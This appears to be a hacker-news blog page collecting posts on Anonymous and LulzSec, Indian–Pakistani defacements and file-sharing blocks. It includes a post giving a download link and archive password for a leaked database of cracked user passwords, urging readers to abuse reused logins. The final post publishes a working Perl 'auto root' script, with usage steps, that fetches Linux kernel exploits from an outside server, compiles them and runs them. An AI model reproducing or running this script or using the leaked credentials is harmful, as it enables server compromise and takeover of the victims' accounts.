Anon & Lulzsec Respond Against The FBI



Hacker groups Anonymous and LulzSec have issued a joint statement in response to recent FBI arrests of suspected Anonymous members thought to have carried out a cyberattack against PayPal in 2010.
In their release, the hackers addressed a statement made to NPR by Steven Chabinsky, deputy assistant FBI director. "We want to send a message that chaos on the Internet is unacceptable," Chabinsky told NPR. "[Even if] hackers can be believed to have social causes, it's entirely unacceptable to break into websites and commit unlawful acts."
The hacker collectives responded with a list of what they define as "unacceptable" practices:

* Governments lying to their citizens and inducing fear and terror to keep them in control by dismantling their freedom piece by piece.
* Corporations aiding and conspiring with said governments while taking advantage at the same time by collecting billions of funds for federal contracts we all know they can't fulfil.
* Lobby conglomerates who only follow their agenda to push the profits higher, while at the same time being deeply involved in governments around the world with the only goal to infiltrate and corrupt them enough so the status quo will never change.
With regards to the arrests of alleged members of Anonymous by the FBI, the hackers wrote, "Your threats to arrest us are meaningless to us as you cannot arrest an idea.  There is nothing - absolutely nothing - you can possibly to do make us stop."
According to the AP, the FBI on Tuesday arrested 14 people across the United States and confiscated computers in connection with the PayPal attack. Another two were arrested for unrelated activities. In addition, Britain's Scotland Yard took into custody one person, and the Dutch National Police Agency arrested four.

Click Here to see the Statement Of ANON & LULZSEC

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

19 Websites Hacked By PakH3X0r

PCA- Pakistan Cyber Army's Database Hacked By Stranger


PCA- Pakistan Cyber Army's Database Hacked By Stranger (ICA- Indian Cyber Army). The DB is available to download

To download the DB click here.

According To Stranger :-

"Here are the cracked passwords i cracked around 1500+ users but the username is not included
in the list so i'll tell you guys a easy way simple download the excel file which is above
open that search the hash in that and you can find the username as well as passwords... shit
to say but some guys used the same passwords to their emails as well so try your luck or elze
what ever u wanna do do it spam, play , abuse or what ever you feel like its all yours
here goes the passwords list

http://www.multiupload.com/ERWJ33UPI2

Archive password:- proud_to_be_indian

Format:- HASH: PASSWORD

RIP THE VICTIMS OF MUMBAI BOMB BLAST

JAI HIND"

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Files Sharing Sites Has been Blocked In India


Files Sharing Sites like Megaupload, Rapidshare has been Blocked In India to stop piracy. The block is implemented because of a court order from Reliance Big Pictures which is trying to stop piracy of their new release Singham. Popular Internet Service Providers MTNL, BSNL and Airtel users have confirmed this activity. 

Reliance BIG Pictures got a “John Doe” order allowing them to service cease and desist notices on movie pirates pirating the film Singham, Mahesh Rangathantan, COO at Reliance Entertainment, told MediaNama. Singham is releasing in theatres tomorrow. What is unique about this order through, according to Big Pictures VP (Music and Anti Piracy) Sanjay Tandon, is that it also covers Internet Service Providers, and not just people selling pirated DVDs or cable operators. “A John Doe order is given against unidentified people, because the copyright owner doesn’t know who is going to infringe. We anticipate that certain entities are going to infringe, and the Delhi High Court has granted us a John Doe order,” Tandon said.
Yesterday, Airtel Broadband users reported that several file sharing websites like MediaFire had been inaccessible,and a notice was displayed, stating that the site has been blocked on request of Department of Telecom. A traceroute search suggested that the block was instituted at Flag Telecom. Our readers also indicated that with certain other ISPs – Zylog and MTNL Triband – the file sharing sites were not accessible.

Tandon said that the order doesn’t necessitate blocking an entire website, but only that ISPs should not make the film Singham accessible: the order only pertains to the access of the film. “Our only appeal with this order is that you cannot make the film available through your network. It’s a matter for the ISPs to look into,because it becomes their liabiltiy.”

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

hellhackerz.com Hacked By Shadow008


Shadow008 Strikes again, this time the victim is hellhackerz.com.

Hacked Site:-

Mirror Link:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Operation Tennessee By Anonymous


Anonymous, a fairly high-profile hacker group, says that it has taken personal data through a Tennessee government website in retaliation for a controversial cyber-bullying law.

The group claims to have taken “personal but not harmful” information, including phone numbers and addresses, in an attack on the TN.gov site over the July 4 weekend that it’s calling “Operation Tennessee.” The data is available here, but since this is a hacker website, click the download at your own risk.
Anonymous says the action is retaliation for a new law that extends the state’s harassment statutes to cover images and messages posted through social media sites. The law has been a hot topic in online discussions, with critics saying its overly broad definitions could be applied to practically anyone who publishes an offensive image online. The state’s attorney general has been asked to weigh in on the matter.

Message From Anonymous:- 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Shak-Attack.pl V.1 ( Auto R00t for Almost all Linux Latest Version ) By PCA


Shak-Attack.pl V.1 is a Linux root exploit designed By Shak from Pakistan Cyber Army (PCA) in Perl coding.
According to Shak:-

"...I found this useful in hacking , so i released my first auto root Perl exploit ,
i name this to Shak-attack.pl

Usage :-

save the below code in text document , and then save as to shak-attack.pl

upload it through shell , change the permission to 777 , and run it by using this command

perl shak-attack.pl

i have added some new Linux local root in it , will release the v2.0 version s00n ,
as I am working on other new Linux exploits , will add them as well ,

and also will add some other tools in this script !

this is a public version ! feel free to use it , if you have any error , let me know !

regards ,

<=Shak=>........"

Shak-Attack.pl V.1 Code:-

#!/usr/bin/perl
############################################
#shak-attack.pl coded by <=Shak=>          #
#Site: http://pakcyberarmy.net/
#Contact : hax_you_anytime@live.com
#Thankx to : z3r0 c0de , Shadow008         #
############################################

if ($ARGV[0] =~ "root" )
{
system("wget http://pakcyberarmy.com/local/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://pakcyberarmy.com/local/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

}

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...